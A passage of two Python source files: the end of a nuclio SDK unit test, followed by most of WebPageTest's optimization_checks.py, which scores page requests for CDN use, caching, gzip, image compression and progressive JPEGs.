self._messages = []
class _Connection(socketserver.BaseRequestHandler):
def handle(self):
self.request.settimeout(1)
# make a file from the socket so we can readln
socket_file = self.request.makefile('r')
# save the connection socket
self.server._connection_socket = self.request
# while the server isn't shut down
while not self.server._BaseServer__shutdown_request:
try:
line = socket_file.readline()
if not line:
continue
message = {
'type': line[0],
'body': json.loads(line[1:]) if line[0] != 's' else ''
}
self.server._messages.append(message)
except:
pass
class TestCallFunction(unittest.TestCase):
def setUp(self):
# provided by _connection_provider
self._mockConnection = unittest.mock.MagicMock()
def test_call_json_body(self):
self._platform = nuclio_sdk.Platform('local', 'somens', self._connection_provider)
# prepare an event to send
event = nuclio_sdk.Event(method='GET', path='path', body={'a': 'some_body'})
# prepare a responder
connection_response = unittest.mock.MagicMock()
connection_response.status = http.client.NO_CONTENT
connection_response.getheaders = lambda: [('Content-Type', 'application/json')]
connection_response.read = unittest.mock.MagicMock(return_value='{"b": "some_response"}')
self._mockConnection.getresponse = unittest.mock.MagicMock(return_value=connection_response)
# send the event
response = self._platform.call_function('function-name', event)
self.assertEqual(self._mockConnection.url, 'nuclio-somens-function-name:8080')
self._mockConnection.request.assert_called_with(event.method,
event.path,
body=json.dumps({'a': 'some_body'}),
headers={
'Content-Type': 'application/json',
'X-Nuclio-Target': 'function-name'
})
self.assertEqual({'b': 'some_response'}, response.body)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http.client.NO_CONTENT, response.status_code)
def test_get_function_url(self):
self.assertEqual(nuclio_sdk.Platform('local', 'ns')._get_function_url('function-name'),
'nuclio-ns-function-name:8080')
self.assertEqual(nuclio_sdk.Platform('kube', 'ns')._get_function_url('function-name'),
'nuclio-function-name:8080')
def _connection_provider(self, url, timeout=None):
self._mockConnection.url = url
return self._mockConnection
|
optimization_checks.py
|
# Copyright 2019 WebPageTest LLC.
# Copyright 2017 Google Inc.
# Use of this source code is governed by the Apache 2.0 license that can be
# found in the LICENSE file.
"""Run the various optimization checks"""
import binascii
import gzip
import logging
import multiprocessing
import os
import re
import shutil
import struct
import subprocess
import sys
import threading
import time
if (sys.version_info > (3, 0)):
from time import monotonic
GZIP_TEXT = 'wt'
unicode = str
else:
from monotonic import monotonic
GZIP_TEXT = 'w'
try:
import ujson as json
except BaseException:
import json
class OptimizationChecks(object):
"""Threaded optimization checks"""
def __init__(self, job, task, requests):
self.job = job
self.task = task
self.running_checks = False
self.requests = requests
self.cdn_thread = None
self.hosting_thread = None
self.gzip_thread = None
self.image_thread = None
self.progressive_thread = None
self.font_thread = None
self.cdn_time = None
self.hosting_time = None
self.gzip_time = None
self.image_time = None
self.progressive_time = None
self.font_time = None
self.cdn_results = {}
self.hosting_results = {}
self.gzip_results = {}
self.image_results = {}
self.progressive_results = {}
self.font_results = {}
self.results = {}
self.dns_lookup_queue = multiprocessing.JoinableQueue()
self.dns_result_queue = multiprocessing.JoinableQueue()
self.fetch_queue = multiprocessing.JoinableQueue()
self.fetch_result_queue = multiprocessing.JoinableQueue()
# spell-checker: disable
self.cdn_cnames = {
'Advanced Hosters CDN': ['.pix-cdn.org'],
'afxcdn.net': ['.afxcdn.net'],
'Akamai': ['.akamai.net',
'.akamaized.net',
'.akamaized-staging.net',
'.akamaiedge.net',
'.akamaiedge-staging.net',
'.akamaihd.net',
'.edgesuite.net',
'.edgesuite-staging.net',
'.edgekey.net',
'.edgekey-staging.net',
'.srip.net',
'.akamaitechnologies.com',
'.akamaitechnologies.fr'],
'Akamai China CDN': ['.tl88.net'],
'Alimama': ['.gslb.tbcache.com'],
'Amazon CloudFront': ['.cloudfront.net'],
'Aryaka': ['.aads1.net',
'.aads-cn.net',
'.aads-cng.net'],
'AT&T': ['.att-dsa.net'],
'Automattic': ['.wp.com',
'.wordpress.com',
'.gravatar.com'],
'Azion': ['.azioncdn.net',
'.azioncdn.com',
'.azion.net'],
'BelugaCDN': ['.belugacdn.com',
'.belugacdn.link'],
'Bison Grid': ['.bisongrid.net'],
'BitGravity': ['.bitgravity.com'],
'Blue Hat Network': ['.bluehatnetwork.com'],
'BO.LT': ['bo.lt'],
'BunnyCDN': ['.b-cdn.net'],
'Cachefly': ['.cachefly.net'],
'Caspowa': ['.caspowa.com'],
'Cedexis': ['.cedexis.net'],
'CDN77': ['.cdn77.net',
'.cdn77.org'],
'CDNetworks': ['.cdngc.net',
'.gccdn.net',
'.panthercdn.com'],
'CDNsun': ['.cdnsun.net'],
'CDNvideo': ['.cdnvideo.ru',
'.cdnvideo.net'],
'ChinaCache': ['.ccgslb.com'],
'ChinaNetCenter': ['.lxdns.com',
'.wscdns.com',
'.wscloudcdn.com',
'.ourwebpic.com'],
'Cloudflare': ['.cloudflare.com',
'.cloudflare.net'],
'Cotendo CDN': ['.cotcdn.net'],
'cubeCDN': ['.cubecdn.net'],
'Edgecast': ['edgecastcdn.net',
'.systemcdn.net',
'.transactcdn.net',
'.v1cdn.net',
'.v2cdn.net',
'.v3cdn.net',
'.v4cdn.net',
'.v5cdn.net'],
'Facebook': ['.facebook.com',
'.facebook.net',
'.fbcdn.net',
'.cdninstagram.com'],
'Fastly': ['.fastly.net',
'.fastlylb.net',
'.nocookie.net'],
'GoCache': ['.cdn.gocache.net'],
'Google': ['.google.',
'googlesyndication.',
'youtube.',
'.googleusercontent.com',
'googlehosted.com',
'.gstatic.com',
'.doubleclick.net'],
'HiberniaCDN': ['.hiberniacdn.com'],
'Highwinds': ['hwcdn.net'],
'Hosting4CDN': ['.hosting4cdn.com'],
'ImageEngine': ['.imgeng.in'],
'Incapsula': ['.incapdns.net'],
'Instart Logic': ['.insnw.net',
'.inscname.net'],
'Internap': ['.internapcdn.net'],
'jsDelivr': ['cdn.jsdelivr.net'],
'KeyCDN': ['.kxcdn.com'],
'KINX CDN': ['.kinxcdn.com',
'.kinxcdn.net'],
'LeaseWeb CDN': ['.lswcdn.net',
'.lswcdn.eu'],
'Level 3': ['.footprint.net',
'.fpbns.net'],
'Limelight': ['.llnwd.net',
'.llnw.net',
'.llnwi.net',
'.lldns.net'],
'MediaCloud': ['.cdncloud.net.au'],
'Medianova': ['.mncdn.com',
'.mncdn.net',
'.mncdn.org'],
'Microsoft Azure': ['.vo.msecnd.net',
'.azureedge.net',
'.azurefd.net',
'.azure.microsoft.com',
'-msedge.net'],
'Mirror Image': ['.instacontent.net',
'.mirror-image.net'],
'NetDNA': ['.netdna-cdn.com',
'.netdna-ssl.com',
'.netdna.com'],
'Netlify': ['.netlify.com'],
'NGENIX': ['.ngenix.net'],
'NYI FTW': ['.nyiftw.net',
'.nyiftw.com'],
'OnApp': ['.r.worldcdn.net',
'.r.worldssl.net'],
'Optimal CDN': ['.optimalcdn.com'],
'PageCDN': ['pagecdn.io'],
'PageRain': ['.pagerain.net'],
'Pressable CDN': ['.pressablecdn.com'],
'PUSHR': ['.pushrcdn.com'],
'Rackspace': ['.raxcdn.com'],
'Reapleaf': ['.rlcdn.com'],
'Reflected Networks': ['.rncdn1.com',
'.rncdn7.com'],
'ReSRC.it': ['.resrc.it'],
'Rev Software': ['.revcn.net',
'.revdn.net'],
'Roast.io': ['.roast.io'],
'Rocket CDN': ['.streamprovider.net'],
'section.io': ['.squixa.net'],
'SFR': ['cdn.sfr.net'],
'SwiftyCDN': ['.swiftycdn.net'],
'Simple CDN': ['.simplecdn.net'],
'Singular CDN': ['.singularcdn.net.br'],
'Sirv CDN': ['.sirv.com'],
'StackPath': ['.stackpathdns.com'],
'SwiftCDN': ['.swiftcdn1.com',
'.swiftserve.com'],
'Taobao': ['.gslb.taobao.com',
'tbcdn.cn',
'.taobaocdn.com'],
'Telenor': ['.cdntel.net'],
'TRBCDN': ['.trbcdn.net'],
'Twitter': ['.twimg.com'],
'UnicornCDN': ['.unicorncdn.net'],
'Universal CDN': ['.cdn12.com',
'.cdn13.com',
'.cdn15.com'],
'VegaCDN': ['.vegacdn.vn',
'.vegacdn.com'],
'VoxCDN': ['.voxcdn.net'],
'XLabs Security': ['.xlabs.com.br',
'.armor.zone'],
'Yahoo': ['.ay1.b.yahoo.com',
'.yimg.',
'.yahooapis.com'],
'Yottaa': ['.yottaa.net'],
'ZEIT Smart CDN': ['.zeit.co'],
'Zenedge': ['.zenedge.net']
}
self.cdn_headers = {
'Airee': [{'Server': 'Airee'}],
'Akamai': [{'x-akamai-staging': 'ESSL'},
{'x-akamai-request-id': ''}],
'Amazon CloudFront': [{'Via': 'CloudFront'}],
'Aryaka': [{'X-Ar-Debug': ''}],
'BelugaCDN': [{'Server': 'Beluga'},
{'X-Beluga-Cache-Status': ''}],
'BunnyCDN': [{'Server': 'BunnyCDN'}],
'Caspowa': [{'Server': 'Caspowa'}],
'CDN': [{'X-Edge-IP': ''},
{'X-Edge-Location': ''}],
'CDN77': [{'Server': 'CDN77'}],
'CDNetworks': [{'X-Px': ''}],
'ChinaNetCenter': [{'X-Cache': 'cache.51cdn.com'}],
'Cloudflare': [{'Server': 'cloudflare'}],
'Edgecast': [{'Server': 'ECS'},
{'Server': 'ECAcc'},
{'Server': 'ECD'}],
'Fastly': [{'X-Served-By': 'cache-', 'X-Cache': ''}],
'Fly': [{'Server': 'Fly.io'}],
'GoCache': [{'Server': 'gocache'}],
'Google': [{'Server': 'sffe'},
{'Server': 'gws'},
{'Server': 'GSE'},
{'Server': 'Golfe2'},
{'Via': 'google'}],
'HiberniaCDN': [{'Server': 'hiberniacdn'}],
'Highwinds': [{'X-HW': ''}],
'Hosting4CDN': [{'x-cdn': 'H4CDN'}],
'ImageEngine': [{'Server': 'ScientiaMobile ImageEngine'}],
'Incapsula': [{'X-CDN': 'Incapsula'},
{'X-Iinfo': ''}],
'Instart Logic': [{'X-Instart-Request-ID': 'instart'}],
'LeaseWeb CDN': [{'Server': 'leasewebcdn'}],
'Medianova': [{'Server': 'MNCDN'}],
'Myra Security CDN': [{'Server': 'myracloud'}],
'Naver': [{'Server': 'Testa/'}],
'NetDNA': [{'Server': 'NetDNA'}],
'Netlify': [{'Server': 'Netlify'}],
'NGENIX': [{'x-ngenix-cache': ''}],
'NYI FTW': [{'X-Powered-By': 'NYI FTW'},
{'X-Delivered-By': 'NYI FTW'}],
'Optimal CDN': [{'Server': 'Optimal CDN'}],
'OVH CDN': [{'X-CDN-Geo': ''},
{'X-CDN-Pop': ''}],
'PageCDN': [{'X-CDN': 'PageCDN'}],
'PUSHR': [{'Via': 'PUSHR'}],
'QUIC.cloud': [{'X-QC-POP': '', 'X-QC-Cache': ''}],
'ReSRC.it': [{'Server': 'ReSRC'}],
'Rev Software': [{'Via': 'Rev-Cache'},
{'X-Rev-Cache': ''}],
'Roast.io': [{'Server': 'Roast.io'}],
'Rocket CDN': [{'x-rocket-node': ''}],
'section.io': [{'section-io-id': ''}],
'SwiftyCDN': [{'X-CDN': 'SwiftyCDN'}],
'Singular CDN': [{'Server': 'SingularCDN'}],
'Sirv CDN': [{'x-sirv-server': ''}],
'Sucuri Firewall': [{'Server': 'Sucuri/Cloudproxy'},
{'x-sucuri-id': ''}],
'Surge': [{'Server': 'SurgeCDN'}],
'Twitter': [{'Server': 'tsa_b'}],
'UnicornCDN': [{'Server': 'UnicornCDN'}],
'XLabs Security': [{'x-cdn': 'XLabs Security'}],
'Yunjiasu': [{'Server': 'yunjiasu'}],
'Zenedge': [{'X-Cdn': 'Zenedge'}],
'ZEIT Smart CDN': [{'Server': 'now'}],
'Zycada Networks': [{'X-Zy-Server': ''}]
}
# spell-checker: enable
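# Matching semantics used by check_cdn_headers (explanatory comment, not from the original source):
# each CDN maps to a list of header groups; a response is attributed to a CDN if, for at least one
# group, every listed header is present and, when a non-empty value is given, the response header
# contains that value as a case-insensitive substring.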
def start(self):
"""Start running the optimization checks"""
logging.debug('Starting optimization checks...')
optimization_checks_disabled = bool('noopt' in self.job and self.job['noopt'])
if self.requests is not None and not optimization_checks_disabled:
self.running_checks = True
# Run the slow checks in background threads
self.cdn_thread = threading.Thread(target=self.check_cdn)
self.hosting_thread = threading.Thread(target=self.check_hosting)
self.gzip_thread = threading.Thread(target=self.check_gzip)
self.image_thread = threading.Thread(target=self.check_images)
self.progressive_thread = threading.Thread(target=self.check_progressive)
self.font_thread = threading.Thread(target=self.check_fonts)
self.cdn_thread.start()
self.hosting_thread.start()
self.gzip_thread.start()
self.image_thread.start()
self.progressive_thread.start()
self.font_thread.start()
# collect the miscellaneous results directly
logging.debug('Checking keep-alive.')
self.check_keep_alive()
logging.debug('Checking caching.')
self.check_cache_static()
logging.debug('Optimization checks started.')
def join(self):
"""Wait for the optimization checks to complete and record the results"""
logging.debug('Waiting for optimization checks to complete')
if self.running_checks:
logging.debug('Waiting for progressive JPEG check to complete')
if self.progressive_thread is not None:
self.progressive_thread.join()
self.progressive_thread = None
if self.progressive_time is not None:
logging.debug("Progressive JPEG check took %0.3f seconds", self.progressive_time)
logging.debug('Waiting for gzip check to complete')
if self.gzip_thread is not None:
self.gzip_thread.join()
self.gzip_thread = None
if self.gzip_time is not None:
logging.debug("gzip check took %0.3f seconds", self.gzip_time)
logging.debug('Waiting for font check to complete')
if self.font_thread is not None:
self.font_thread.join()
self.font_thread = None
if self.font_time is not None:
logging.debug("font check took %0.3f seconds", self.font_time)
logging.debug('Waiting for image check to complete')
if self.image_thread is not None:
self.image_thread.join()
self.image_thread = None
if self.image_time is not None:
logging.debug("image check took %0.3f seconds", self.image_time)
logging.debug('Waiting for CDN check to complete')
if self.cdn_thread is not None:
self.cdn_thread.join()
self.cdn_thread = None
if self.cdn_time is not None:
logging.debug("CDN check took %0.3f seconds", self.cdn_time)
logging.debug('Waiting for Hosting check to complete')
if self.hosting_thread is not None:
self.hosting_thread.join()
self.hosting_thread = None
if self.hosting_time is not None:
logging.debug("Hosting check took %0.3f seconds", self.hosting_time)
# Merge the results together
for request_id in self.cdn_results:
if request_id not in self.results:
self.results[request_id] = {}
self.results[request_id]['cdn'] = self.cdn_results[request_id]
for request_id in self.gzip_results:
if request_id not in self.results:
self.results[request_id] = {}
self.results[request_id]['gzip'] = self.gzip_results[request_id]
for request_id in self.image_results:
if request_id not in self.results:
self.results[request_id] = {}
self.results[request_id]['image'] = self.image_results[request_id]
for request_id in self.progressive_results:
if request_id not in self.results:
self.results[request_id] = {}
self.results[request_id]['progressive'] = self.progressive_results[request_id]
for request_id in self.font_results:
if request_id not in self.results:
self.results[request_id] = {}
self.results[request_id]['font'] = self.font_results[request_id]
if self.task is not None and 'page_data' in self.task:
for name in self.hosting_results:
self.task['page_data'][name] = self.hosting_results[name]
# Save the results
if self.results:
path = os.path.join(self.task['dir'], self.task['prefix']) + '_optimization.json.gz'
gz_file = gzip.open(path, GZIP_TEXT, 7)
if gz_file:
gz_file.write(json.dumps(self.results))
gz_file.close()
logging.debug('Optimization checks complete')
return self.results
def check_keep_alive(self):
"""Check for requests where the connection is force-closed"""
if (sys.version_info > (3, 0)):
from urllib.parse import urlsplit # pylint: disable=import-error
else:
from urlparse import urlsplit # pylint: disable=import-error
# build a list of origins and how many requests were issued to each
origins = {}
for request_id in self.requests:
request = self.requests[request_id]
if 'url' in request:
url = request['full_url'] if 'full_url' in request else request['url']
parsed = urlsplit(url)
origin = parsed.scheme + '://' + parsed.netloc
if origin not in origins:
origins[origin] = 0
origins[origin] += 1
for request_id in self.requests:
try:
request = self.requests[request_id]
if 'url' in request:
check = {'score': 100}
url = request['full_url'] if 'full_url' in request else request['url']
parsed = urlsplit(url)
origin = parsed.scheme + '://' + parsed.netloc
if origins[origin] > 1:
check['score'] = 100
keep_alive = self.get_header_value(request['response_headers'],
'Connection')
if keep_alive is not None and keep_alive.lower().strip().find('close') > -1:
check['score'] = 0
if request_id not in self.results:
self.results[request_id] = {}
self.results[request_id]['keep_alive'] = check
except Exception:
logging.exception('Error checking keep-alive')
def get_time_remaining(self, request):
"""See if a request is static and how long it can be cached for"""
from email.utils import parsedate
re_max_age = re.compile(r'max-age[ ]*=[ ]*(?P<maxage>[\d]+)')
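# Freshness computation implemented below (summary comment added for clarity): prefer
# Cache-Control max-age minus any Age header; otherwise fall back to Expires minus the Date
# header (or the current time when Date is missing). A max-age of zero or an Expires in the
# past, as well as no-store / no-cache directives, mark the response as not statically cacheable.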
is_static = False
time_remaining = -1
try:
if 'response_headers' in request:
content_length = self.get_header_value(request['response_headers'],
'Content-Length')
if content_length is not None:
content_length = int(re.search(r'\d+', str(content_length)).group())
if content_length == 0:
return is_static, time_remaining
if 'response_headers' in request:
content_type = self.get_header_value(request['response_headers'],
'Content-Type')
if content_type is None or \
(content_type.find('/html') == -1 and
content_type.find('/cache-manifest') == -1):
is_static = True
cache = self.get_header_value(request['response_headers'], 'Cache-Control')
pragma = self.get_header_value(request['response_headers'], 'Pragma')
expires = self.get_header_value(request['response_headers'], 'Expires')
max_age_matches = None
if cache is not None:
max_age_matches = re.search(re_max_age, cache)
cache = cache.lower()
if cache.find('no-store') > -1 or cache.find('no-cache') > -1:
is_static = False
if is_static and pragma is not None:
pragma = pragma.lower()
if pragma.find('no-cache') > -1:
is_static = False
if is_static:
time_remaining = 0
if max_age_matches is not None:
time_remaining = int(max_age_matches.groupdict().get('maxage'))
age = self.get_header_value(request['response_headers'], 'Age')
if time_remaining == 0:
is_static = False
time_remaining = -1
elif age is not None:
time_remaining -= int(re.search(r'\d+',
str(age).strip()).group())
elif expires is not None:
date = self.get_header_value(request['response_headers'], 'Date')
exp = time.mktime(parsedate(expires))
if date is not None:
now = time.mktime(parsedate(date))
else:
now = time.time()
time_remaining = int(exp - now)
if time_remaining < 0:
is_static = False
except Exception:
logging.exception('Error calculating time remaining')
return is_static, time_remaining
def check_cache_static(self):
"""Check static resources for how long they are cacheable for"""
for request_id in self.requests:
try:
request = self.requests[request_id]
check = {'score': -1, 'time': 0}
if 'status' in request and request['status'] == 200:
is_static, time_remaining = self.get_time_remaining(request)
if is_static:
check['time'] = time_remaining
if time_remaining >= 604800: # 7 days
check['score'] = 100
elif time_remaining >= 3600: # 1 hour
check['score'] = 50
else:
check['score'] = 0
if check['score'] >= 0:
if request_id not in self.results:
self.results[request_id] = {}
self.results[request_id]['cache'] = check
except Exception:
logging.exception('Error checking cache static')
def check_hosting(self):
"""Pull the data needed to determine the hosting"""
start = monotonic()
self.hosting_results['base_page_ip_ptr'] = ''
self.hosting_results['base_page_cname'] = ''
self.hosting_results['base_page_dns_server'] = ''
domain = None
if self.task is not None and 'page_data' in self.task and \
'document_hostname' in self.task['page_data']:
domain = self.task['page_data']['document_hostname']
if domain is not None:
try:
from dns import resolver, reversename
dns_resolver = resolver.Resolver()
dns_resolver.timeout = 5
dns_resolver.lifetime = 5
# reverse-lookup the edge server
try:
addresses = dns_resolver.query(domain)
if addresses:
addr = str(addresses[0])
addr_name = reversename.from_address(addr)
if addr_name:
name = str(dns_resolver.query(addr_name, "PTR")[0])
if name:
self.hosting_results['base_page_ip_ptr'] = name.strip('. ')
except Exception:
pass
# get the CNAME for the address
try:
answers = dns_resolver.query(domain, 'CNAME')
if answers and len(answers):
for rdata in answers:
name = '.'.join(rdata.target).strip(' .')
if name != domain:
self.hosting_results['base_page_cname'] = name
break
except Exception:
pass
# get the name server for the domain
done = False
while domain is not None and not done:
try:
dns_servers = dns_resolver.query(domain, "NS")
dns_name = str(dns_servers[0].target).strip('. ')
if dns_name:
self.hosting_results['base_page_dns_server'] = dns_name
done = True
except Exception:
pass
pos = domain.find('.')
if pos > 0:
domain = domain[pos + 1:]
else:
domain = None
except Exception:
logging.exception('Error checking hosting')
self.hosting_time = monotonic() - start
def check_cdn(self):
"""Check each request to see if it was served from a CDN"""
if (sys.version_info > (3, 0)):
from urllib.parse import urlparse # pylint: disable=import-error
else:
from urlparse import urlparse # pylint: disable=import-error
start = monotonic()
# First pass, build a list of domains and see if the headers or domain matches
static_requests = {}
domains = {}
for request_id in self.requests:
request = self.requests[request_id]
is_static, _ = self.get_time_remaining(request)
if is_static:
static_requests[request_id] = True
if 'url' in request:
url = request['full_url'] if 'full_url' in request else request['url']
domain = urlparse(url).hostname
if domain is not None:
if domain not in domains:
# Check the domain itself against the CDN list
domains[domain] = ''
provider = self.check_cdn_name(domain)
if provider is not None:
domains[domain] = provider
# Spawn several workers to do CNAME lookups for the unknown domains
count = 0
for domain in domains:
if not domains[domain]:
count += 1
self.dns_lookup_queue.put(domain)
if count:
thread_count = min(10, count)
threads = []
for _ in range(thread_count):
thread = threading.Thread(target=self.dns_worker)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
try:
while True:
dns_result = self.dns_result_queue.get_nowait()
domains[dns_result['domain']] = dns_result['provider']
except Exception:
pass
# Final pass, populate the CDN info for each request
for request_id in self.requests:
check = {'score': -1, 'provider': ''}
request = self.requests[request_id]
if request_id in static_requests:
check['score'] = 0
if 'url' in request:
url = request['full_url'] if 'full_url' in request else request['url']
domain = urlparse(url).hostname
if domain is not None:
if domain in domains and domains[domain]:
check['score'] = 100
check['provider'] = domains[domain]
if not check['provider'] and 'response_headers' in request:
provider = self.check_cdn_headers(request['response_headers'])
if provider is not None:
check['score'] = 100
check['provider'] = provider
self.cdn_results[request_id] = check
self.cdn_time = monotonic() - start
def find_dns_cdn(self, domain, depth=0):
"""Recursively check a CNAME chain"""
from dns import resolver, reversename
dns_resolver = resolver.Resolver()
dns_resolver.timeout = 1
dns_resolver.lifetime = 1
provider = self.check_cdn_name(domain)
# First do a CNAME check
if provider is None:
try:
answers = dns_resolver.query(domain, 'CNAME')
if answers and len(answers):
for rdata in answers:
name = '.'.join(rdata.target).strip(' .')
if name != domain:
provider = self.check_cdn_name(name)
if provider is None and depth < 10:
provider = self.find_dns_cdn(name, depth + 1)
if provider is not None:
break
except Exception:
pass
# Try a reverse-lookup of the address
if provider is None:
try:
addresses = dns_resolver.query(domain)
if addresses:
addr = str(addresses[0])
addr_name = reversename.from_address(addr)
if addr_name:
name = str(dns_resolver.query(addr_name, "PTR")[0])
if name:
provider = self.check_cdn_name(name)
except Exception:
pass
return provider
def dns_worker(self):
"""Handle the DNS CNAME lookups and checking in multiple threads"""
try:
while True:
domain = self.dns_lookup_queue.get_nowait()
try:
provider = self.find_dns_cdn(domain)
if provider is not None:
self.dns_result_queue.put({'domain': domain, 'provider': provider})
except Exception:
logging.debug('Error in dns worker')
self.dns_lookup_queue.task_done()
except Exception:
pass
def check_cdn_name(self, domain):
"""Check the given domain against our cname list"""
if domain is not None and len(domain):
check_name = domain.lower()
for cdn in self.cdn_cnames:
for cname in self.cdn_cnames[cdn]:
if check_name.find(cname) > -1:
return cdn
return None
def check_cdn_headers(self, headers):
"""Check the given headers against our header list"""
matched_cdns = []
for cdn in self.cdn_headers:
for header_group in self.cdn_headers[cdn]:
all_match = True
for name in header_group:
value = self.get_header_value(headers, name)
if value is None:
all_match = False
break
else:
value = value.lower()
check = header_group[name].lower()
if len(check) and value.find(check) == -1:
all_match = False
break
if all_match:
matched_cdns.append(cdn)
break
if not len(matched_cdns):
return None
return ', '.join(matched_cdns)
def check_gzip(self):
"""Check each request to see if it can be compressed"""
start = monotonic()
for request_id in self.requests:
try:
request = self.requests[request_id]
content_length = None
if 'response_headers' in request:
content_length = self.get_header_value(request['response_headers'], 'Content-Length')
if 'objectSize' in request:
content_length = request['objectSize']
elif content_length is not None:
content_length = int(re.search(r'\d+', str(content_length)).group())
elif 'transfer_size' in request:
content_length = request['transfer_size']
if content_length is None:
content_length = 0
check = {'score': 0, 'size': content_length, 'target_size': content_length}
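# Score semantics used below (summary comment added for clarity): 100 means the response is already
# compressed (gzip/deflate/br); -1 means the check does not apply (response fits in a single ~1400 byte
# packet, content sniffs as a binary/image type, or gzip would not save at least one packet and 10%);
# otherwise the score is the gzipped size expressed as a percentage of the original size.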
encoding = None
if 'response_headers' in request:
encoding = self.get_header_value(request['response_headers'],
'Content-Encoding')
# Check for responses that are already compressed (ignore the level)
if encoding is not None:
if encoding.find('gzip') >= 0 or \
encoding.find('deflate') >= 0 or \
encoding.find('br') >= 0:
check['score'] = 100
# Ignore small responses that will fit in a packet
if not check['score'] and content_length < 1400:
check['score'] = -1
# Try compressing it if it isn't an image
if not check['score'] and 'body' in request:
sniff_type = self.sniff_file_content(request['body'])
if sniff_type is not None:
check['score'] = -1
else:
out_file = request['body'] + '.gzip'
with open(request['body'], 'rb') as f_in:
with gzip.open(out_file, 'wb', 7) as f_out:
shutil.copyfileobj(f_in, f_out)
if os.path.isfile(out_file):
target_size = os.path.getsize(out_file)
try:
os.remove(out_file)
except Exception:
pass
if target_size is not None:
delta = content_length - target_size
# Only count it if there is at least 1 packet and 10% savings
if target_size > 0 and \
delta > 1400 and \
target_size < (content_length * 0.9):
check['target_size'] = target_size
check['score'] = int(target_size * 100 / content_length)
else:
check['score'] = -1
else:
check['score'] = -1
else:
check['score'] = -1
if check['score'] >= 0:
self.gzip_results[request_id] = check
except Exception:
logging.exception('Error checking gzip')
self.gzip_time = monotonic() - start
def check_images(self):
"""Check each request to see if images can be compressed better"""
start = monotonic()
for request_id in self.requests:
try:
request = self.requests[request_id]
content_length = None
if 'response_headers' in request:
content_length = self.get_header_value(request['response_headers'], 'Content-Length')
if content_length is not None:
content_length = int(re.search(r'\d+', str(content_length)).group())
elif 'transfer_size' in request:
content_length = request['transfer_size']
check = {'score': -1, 'size': content_length, 'target_size': content_length}
if content_length and 'body' in request:
sniff_type = self.sniff_file_content(request['body'])
if sniff_type == 'jpeg':
if content_length < 1400:
check['score'] = 100
else:
# Compress it as a quality 85 stripped progressive image and compare
jpeg_file = request['body'] + '.jpg'
command = '{0} -define jpeg:dct-method=fast -strip '\
'-interlace Plane -quality 85 '\
'"{1}" "{2}"'.format(self.job['image_magick']['convert'],
request['body'], jpeg_file)
subprocess.call(command, shell=True)
if os.path.isfile(jpeg_file):
target_size = os.path.getsize(jpeg_file)
try:
os.remove(jpeg_file)
except Exception:
pass
delta = content_length - target_size
# Only count it if there is at least 1 packet savings
if target_size > 0 and delta > 1400:
check['target_size'] = target_size
check['score'] = int(target_size * 100 / content_length)
else:
check['score'] = 100
elif sniff_type == 'png':
if 'response_body' not in request:
request['response_body'] = ''
with open(request['body'], 'rb') as f_in:
request['response_body'] = f_in.read()
if content_length < 1400:
check['score'] = 100
else:
# spell-checker: disable
image_chunks = [b"iCCP", b"tIME", b"gAMA", b"PLTE", b"acTL", b"IHDR", b"cHRM",
b"bKGD", b"tRNS", b"sBIT", b"sRGB", b"pHYs", b"hIST", b"vpAg",
b"oFFs", b"fcTL", b"fdAT", b"IDAT"]
# spell-checker: enable
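# PNG layout relied on below (explanatory comment, not from the original source): after the 8-byte
# signature, each chunk is a 4-byte big-endian length, a 4-byte type, the data, and a 4-byte CRC
# (12 bytes of overhead per chunk). Summing only the whitelisted chunk types above estimates the
# size of the image with ancillary metadata stripped.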
body = request['response_body']
image_size = len(body)
valid = True
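                            # A PNG file starts with an 8-byte signature; every chunk after it
                            # carries 12 bytes of overhead (4-byte length, 4-byte type, 4-byte CRC),
                            # so include that overhead when totaling the chunks worth keeping.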
target_size = 8
bytes_remaining = image_size - 8
pos = 8
while valid and bytes_remaining >= 4:
chunk_len = struct.unpack('>I', body[pos: pos + 4])[0]
pos += 4
if chunk_len + 12 <= bytes_remaining:
chunk_type = body[pos: pos + 4]
pos += 4
if chunk_type in image_chunks:
target_size += chunk_len + 12
pos += chunk_len + 4 # Skip the data and CRC
bytes_remaining -= chunk_len + 12
else:
valid = False
bytes_remaining = 0
if valid:
delta = content_length - target_size
# Only count it if there is at least 1 packet savings
if target_size > 0 and delta > 1400:
check['target_size'] = target_size
check['score'] = int(target_size * 100 / content_length)
else:
check['score'] = 100
elif sniff_type == 'gif':
if content_length < 1400:
check['score'] = 100
else:
is_animated = False
from PIL import Image
with Image.open(request['body']) as gif:
try:
gif.seek(1)
except EOFError:
is_animated = False
else:
is_animated = True
if is_animated:
check['score'] = 100
else:
# Convert it to a PNG
png_file = request['body'] + '.png'
command = 'convert "{0}" "{1}"'.format(request['body'], png_file)
subprocess.call(command, shell=True)
if os.path.isfile(png_file):
target_size = os.path.getsize(png_file)
try:
os.remove(png_file)
except Exception:
pass
delta = content_length - target_size
# Only count it if there is at least 1 packet savings
if target_size > 0 and delta > 1400:
check['target_size'] = target_size
check['score'] = int(target_size * 100 / content_length)
else:
check['score'] = 100
elif sniff_type == 'webp':
check['score'] = 100
if check['score'] >= 0:
self.image_results[request_id] = check
except Exception:
logging.exception('Error checking images')
self.image_time = monotonic() - start
def check_progressive(self):
"""Count the number of scan lines in each jpeg"""
from PIL import Image
start = monotonic()
for request_id in self.requests:
try:
request = self.requests[request_id]
if 'body' in request:
sniff_type = self.sniff_file_content(request['body'])
if sniff_type == 'jpeg':
check = {'size': os.path.getsize(request['body']), 'scan_count': 1}
image = Image.open(request['body'])
info = dict(image.info)
image.close()
if 'progression' in info and info['progression']:
check['scan_count'] = 0
if 'response_body' not in request:
request['response_body'] = ''
with open(request['body'], 'rb') as f_in:
request['response_body'] = f_in.read()
body = request['response_body']
content_length = len(request['response_body'])
pos = 0
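                        # Walk the JPEG marker stream: each marker is 0xff followed by a type
                        # byte. 0xda (Start of Scan) begins a scan, so counting SOS markers
                        # gives the scan count; 0x01 and 0xd0-0xd9 are standalone markers
                        # with no length field.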
try:
while pos < content_length:
block = struct.unpack('B', body[pos])[0]
pos += 1
if block != 0xff:
break
block = struct.unpack('B', body[pos])[0]
pos += 1
while block == 0xff:
block = struct.unpack('B', body[pos])[0]
pos += 1
if block == 0x01 or (block >= 0xd0 and block <= 0xd9):
continue
elif block == 0xda: # Image data
check['scan_count'] += 1
# Seek to the next non-padded 0xff to find the next marker
found = False
while not found and pos < content_length:
value = struct.unpack('B', body[pos])[0]
pos += 1
if value == 0xff:
value = struct.unpack('B', body[pos])[0]
pos += 1
if value != 0x00:
found = True
pos -= 2
else:
